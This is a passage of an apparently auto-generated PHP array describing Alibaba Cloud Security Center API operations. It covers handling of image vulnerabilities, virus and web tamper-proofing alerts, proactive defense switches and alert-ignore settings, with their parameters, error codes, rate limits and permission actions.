endpoint engine detection, container network visualization, and container escape prevention.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateCommonTargetConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:OperateCommonTargetConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"95D45C44-4F53-5ED2-8E12-7D134564B****\\"\\n}","type":"json"}]', ], 'OperateImageBaselineWhitelist' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'BaselineItemKeyList', 'in' => 'query', 'schema' => ['description' => 'The list of baseline sub-item keys.', 'type' => 'string', 'required' => true, 'example' => 'hc.image.checklist.identify.hc_exploit_es_linux.item', 'title' => ''], ], [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['description' => 'The operation type. Valid values:'."\n" ."\n" .'- **add**: increase.'."\n" .'- **del**: delete.', 'type' => 'string', 'required' => true, 'example' => 'add', 'title' => ''], ], [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The image UUID.', 'type' => 'string', 'required' => false, 'example' => 'a5250ebca765dc9eb1a84b790b0e****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of scan ranges.', 'type' => 'array', 'items' => ['description' => 'The scan range. Valid values:'."\n" ."\n" .'- **image**: image.'."\n" .'- **container**: container.', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '75AD186B-B46A-56CC-BE35-987ADDF6****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Manage image baseline whitelist', 'summary' => 'Manages the whitelist of image baseline check items.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateImageBaselineWhitelist'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OperateImageBaselineWhitelist', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"75AD186B-B46A-56CC-BE35-987ADDF6****\\"\\n}","type":"json"}]', ], 'OperateImageVul' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92415', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Info', 'in' => 'query', 'schema' => ['description' => 'The information about the vulnerability to be processed. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- namespace: the image namespace.'."\n" .'- repoName: the name of the ACR image repository.'."\n" .'- regionId: the region.'."\n" .'- instanceId: the ID of the ACR instance.'."\n" .'- repoId: the ID of the repository.'."\n" .'- tag: the original tag of the image.'."\n" .'- digest: the digest of the image.'."\n" .'- newTag: the tag of the image after the fix.'."\n" .'- uuid: the UUID of the image.'."\n" .'- ids: the list of primary key IDs of the vulnerabilities.', 'type' => 'string', 'required' => false, 'example' => '[{\\"namespace\\":\\"cloud_oa****\\",\\"repoName\\":\\"hybirdc****\\",\\"regionId\\":\\"cn-shanghai\\",\\"instanceId\\":\\"cri-rv4nvbv8iju4****\\",\\"repoId\\":\\"crr-2q7302qrofxg****\\",\\"tag\\":\\"hybird-cloud-web_fix_167115945****\\",\\"digest\\":\\"e1a4fd25884ca2ef8840bb252c9926e4f549df9e046500dd93539b2d458c****\\",\\"newTag\\":\\"hybird-cloud-web_fix_167115996****\\",\\"uuid\\":\\"4ad91dd8c0c02de6574fa98085d0****\\",\\"ids\\":[197540864,197540865,197540869]}]', 'title' => ''], ], [ 'name' => 'OperateType', 'in' => 'query', 'schema' => ['description' => 'The operation type for image vulnerability fix. Set this parameter to vul_fix.', 'type' => 'string', 'required' => false, 'example' => 'vul_fix', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The vulnerability type. Set this parameter to cve.', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '486F2228-438A-544A-A533-433F943C15CD', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Operate on image vulnerabilities', 'summary' => 'Performs operations on image vulnerabilities. Supported operation types include fix, verify, ignore, and unignore.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateImageVul'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OperateImageVul', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"486F2228-438A-544A-A533-433F943C15CD\\"\\n}","type":"json"}]', ], 'OperateSuspiciousOverallConfig' => [ 'summary' => 'Sets the global configuration for abnormal events.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '101927', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '222.178.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The switch type. Valid values:'."\n" ."\n" .'- **auto_breaking**: Anti-virus'."\n" .'- **ransomware_breaking**: Anti-ransomware (bait capture)'."\n" .'- **webshell\\_cloud_breaking**: Website backdoor connection defense'."\n" .'- **alinet**: Malicious network behavior defense'."\n" .'- **k8s\\_log_analysis**: Container K8s threat detection'."\n" .'- **alisecguard**: Client self-protection defense mode', 'type' => 'string', 'required' => true, 'example' => 'k8s_log_analysis', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The switch status. Valid values:'."\n" ."\n" .'- **on**: Enable'."\n" .'- **off**: Disable', 'type' => 'string', 'required' => true, 'example' => 'off', 'title' => ''], ], [ 'name' => 'NoTargetAsOn', 'in' => 'query', 'schema' => ['description' => 'Specifies whether asset configuration is required. Default value: **false**. Valid values:'."\n" .'- **true**: Required'."\n" .'- **false**: Not required'."\n" .'> This value takes effect only when **config** is set to **on**.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is a unique identifier generated by Alibaba Cloud for this request. You can use this ID to troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'C286491D-4A2F-589A-B63B-D2AD3DA9BD71', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Set the global configuration for abnormal events', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateSuspiciousOverallConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OperateSuspiciousOverallConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C286491D-4A2F-589A-B63B-D2AD3DA9BD71\\"\\n}","type":"json"}]', ], 'OperateSuspiciousTargetConfig' => [ 'summary' => 'Configures the scope on which proactive defense takes effect.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of proactive defense. Valid Values:'."\n" ."\n" .'* **auto_breaking**: automatic blocking'."\n" .'* **webshell_cloud_breaking**: webshell defense'."\n" .'* **alinet**: malicious behavior defense'."\n" .'* **ransomware_breaking**: ransomware capture'."\n" .'* **alisecguard**: client protection'."\n", 'type' => 'string', 'required' => true, 'example' => 'auto_breaking', 'title' => ''], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['description' => 'The dimension from which you manage proactive defense. Only the server UUID dimension is supported.'."\n" ."\n" .'Set the value to **uuid**.'."\n", 'type' => 'string', 'required' => true, 'example' => 'uuid', 'title' => ''], ], [ 'name' => 'TargetOperations', 'in' => 'query', 'schema' => ['description' => 'The configuration of proactive defense for your server. The value includes the following fields:'."\n" ."\n" .'* **targetType**: specifies the dimension from which you manage proactive defense. UUIDs are supported. Set the value to **uuid**.'."\n" .'* **target**: specifies the UUID of the server for which you want to configure proactive defense.'."\n" .'* **flag**: specifies whether to enable or disable proactive defense for your server. Valid values are **add** and **del**. The value add indicates that proactive defense will be enabled for your server. The value del indicates that proactive defense will be disabled for your server.'."\n", 'type' => 'string', 'required' => true, 'example' => '"[{"targetType":"uuid","target":"0585f81a-dd84-4ddf-9971-f59d12345678","flag":"add"},{"targetType":"uuid","target":"01acfd9d-e6a4-4e61-b9eb-aae012345678","flag":"add"},{"targetType":"uuid","target":"04a0e735-ad32-4835-b635-045812345678","flag":"add"}]"', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'ABCD-PSD2-5256-1DSA-4222-JHBN', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'OperateSuspiciousTargetConfig', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateSuspiciousTargetConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OperateSuspiciousTargetConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"ABCD-PSD2-5256-1DSA-4222-JHBN\\"\\n}","errorExample":""},{"type":"xml","example":"\\n ABCD-PSD2-5256-1DSA-4222-JHBN\\n","errorExample":""}]', ], 'OperateSwitchStatus' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => ['operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'RuleId', 'in' => 'query', 'schema' => ['description' => 'The rule ID.'."\n" .'> You can call the [ListSasContainerWebDefenseRule](~~2623606~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '900001', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the container tamper-proofing rule. Valid values:'."\n" .'- on: enabled.'."\n" .'- off: disabled.', 'type' => 'string', 'required' => true, 'example' => 'on', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '8AE9D3DA-406B-51FA-AA1C-89440C1459BF', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Change the status of a container file defense rule', 'summary' => 'Changes the status of a container file defense rule.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateSwitchStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:OperateSwitchStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8AE9D3DA-406B-51FA-AA1C-89440C1459BF\\"\\n}","type":"json"}]', ], 'OperateUnknownThreatDetectMachine' => [ 'summary' => 'Modifies the unknown threat detection settings for specified servers.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'type' => 'array', 'items' => ['description' => 'The UUID of the server.', 'type' => 'string', 'required' => false, 'example' => '083036e9-8411-4a9d-83af-9acbd****', 'title' => ''], 'maxItems' => 100, 'description' => 'A list of server UUIDs.', 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'OperateType', 'in' => 'query', 'schema' => ['description' => 'The operation type. Valid values:'."\n" ."\n" .'- **restart\\_study**: Restarts the learning process.'."\n" ."\n" .'- **increment\\_study**: Starts incremental learning.'."\n" ."\n" .'- **change\\_status**: Changes the status.', 'type' => 'string', 'required' => false, 'example' => 'restart_study', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The target status. This parameter applies only when `OperateType` is set to `change_status`. Valid values:'."\n" ."\n" .'- **monitoring**: Monitoring mode.'."\n" ."\n" .'- **blocking**: Blocking mode.', 'type' => 'string', 'required' => false, 'example' => 'monitoring', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'title' => '', 'example' => '20456DD5-5CBF-5015-9173-12CA4246B***'], ], 'title' => '', 'description' => 'The response body.', 'example' => '', ], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'OperateUnknownThreatDetectMachine', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:OperateUnknownThreatDetectMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"20456DD5-5CBF-5015-9173-12CA4246B***\\"\\n}","type":"json"}]', ], 'OperateVirusEvents' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92417', 'abilityTreeNodes' => ['FEATUREsasE5WAEJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'OperationCode', 'in' => 'query', 'schema' => ['description' => 'The method to handle the alert event. Valid values:'."\n" ."\n" .'- **default**: deep scan and removal'."\n" .'- **ignore**: ignore'."\n" .'- **advance\\_mark\\_mis_info**: add to whitelist'."\n" .'- **manual_handled**: manually handled.', 'type' => 'string', 'required' => true, 'example' => 'default', 'title' => ''], ], [ 'name' => 'OperationRange', 'in' => 'query', 'schema' => ['description' => 'The scope of the handling operation.', 'type' => 'string', 'required' => false, 'example' => '[{\\"type\\":\\"machine\\",\\"list\\":[\\"xxxxxxxxx-4cbf-4ca6-a1b7-8a09d1f86ab0\\"]}]', 'title' => ''], ], [ 'name' => 'OperationAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to handle all alerts. Valid values:'."\n" .'- **1**: yes'."\n" .'- **0**: no.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the task for batch handling virus defense alert events.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'B72BEC03-001C-5C77-A4BB-1E6XXXXXXX', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Handle virus defense alerts', 'summary' => 'Handles virus defense alerts in batches. The handling types include deep scan and removal, adding to whitelist, ignoring, and manual handling.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateVirusEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:OperateVirusEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"TaskId\\": 1,\\n \\"RequestId\\": \\"B72BEC03-001C-5C77-A4BB-1E6XXXXXXX\\"\\n}","type":"json"}]', ], 'OperateVuls' => [ 'summary' => 'Fixes a Linux software vulnerability.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92418', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to fix. Set the value to **cve**, which indicates a Linux software vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'OperateType', 'in' => 'query', 'schema' => ['description' => 'The method to handle the vulnerability. Set the value to **vul_fix**, which indicates fixing the vulnerability.', 'type' => 'string', 'required' => true, 'example' => 'vul_fix', 'title' => ''], ], [ 'name' => 'VulNames', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The names of the vulnerabilities to fix.', 'type' => 'array', 'items' => ['description' => 'The name of the vulnerability to fix.', 'type' => 'string', 'required' => false, 'example' => 'oval:com.ubuntu.xenial:def:2020355240000000', 'title' => ''], 'required' => true, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], [ 'name' => 'Uuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers on which you want to fix the vulnerabilities.', 'type' => 'array', 'items' => ['description' => 'The UUID of the server on which you want to fix the vulnerability.', 'type' => 'string', 'required' => false, 'example' => '14f14260-xxxx-46ea-a157-451983a1****', 'title' => ''], 'required' => true, 'maxItems' => 10000, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'C2677612-7207-4AEB-BD48-8BA528F86777', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 200 => [ ['errorCode' => 'operateVulError', 'errorMessage' => 'Operate vul is error.', 'description' => ''], ], 400 => [ ['errorCode' => 'InsufficientAuthorizationCount', 'errorMessage' => 'Authorization count is insufficient.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Fix a Linux software vulnerability', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateVuls'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-aegis:OperateVuls', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C2677612-7207-4AEB-BD48-8BA528F86777\\"\\n}","type":"json"}]', ], 'OperateWebLockFileEvents' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '92419', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'DealAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to handle all alert events. Valid values:'."\n" .'- **1**: yes'."\n" .'- **0**: no.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'OperationCode', 'in' => 'query', 'schema' => ['description' => 'The method to handle the alert event. Valid values:'."\n" ."\n" .'- **mark_mis_info**: marks the alert as a false positive'."\n" .'- **rm_mark_mis_info**: unmarks the false positive'."\n" .'- **offline_handled**: handled offline'."\n" .'- **whitelist**: adds to the whitelist'."\n" .'- **rm_whitelist**: removes from the whitelist.', 'type' => 'string', 'required' => true, 'example' => 'whitelist', 'title' => ''], ], [ 'name' => 'EventIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of alert event IDs.', 'type' => 'array', 'items' => ['description' => 'The ID of the web tamper-proofing alert event to handle.'."\n" .'> You can call the [DescribeWebLockFileEvents](~~DescribeWebLockFileEvents~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2663238081', 'title' => ''], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '2884C186-E8C0-5611-8207-3FF15EE7D9B4', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Handle web tamper-proofing alerting events', 'summary' => 'Handles web tamper-proofing alerting events.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'OperateWebLockFileEvents'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:OperateWebLockFileEvents', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2884C186-E8C0-5611-8207-3FF15EE7D9B4\\"\\n}","type":"json"}]', ], 'OperationCancelIgnoreSuspEvent' => [ 'summary' => 'Cancels ignoring alert events.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'SecurityEventIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The IDs of alert events.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the alert event.'."\n" ."\n" .'> You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to query the IDs of alert events.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '611689', 'title' => ''], 'required' => true, 'maxItems' => 200, 'example' => '', ], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The remarks.'."\n", 'type' => 'string', 'required' => false, 'example' => 'remark text', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult'."\n", 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'The handling result of an exception. Valid values:'."\n" ."\n" .'* **true**: successful'."\n" .'* **false**: failed'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was is successful. Other status codes indicate that the request fails. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'TimeCost' => 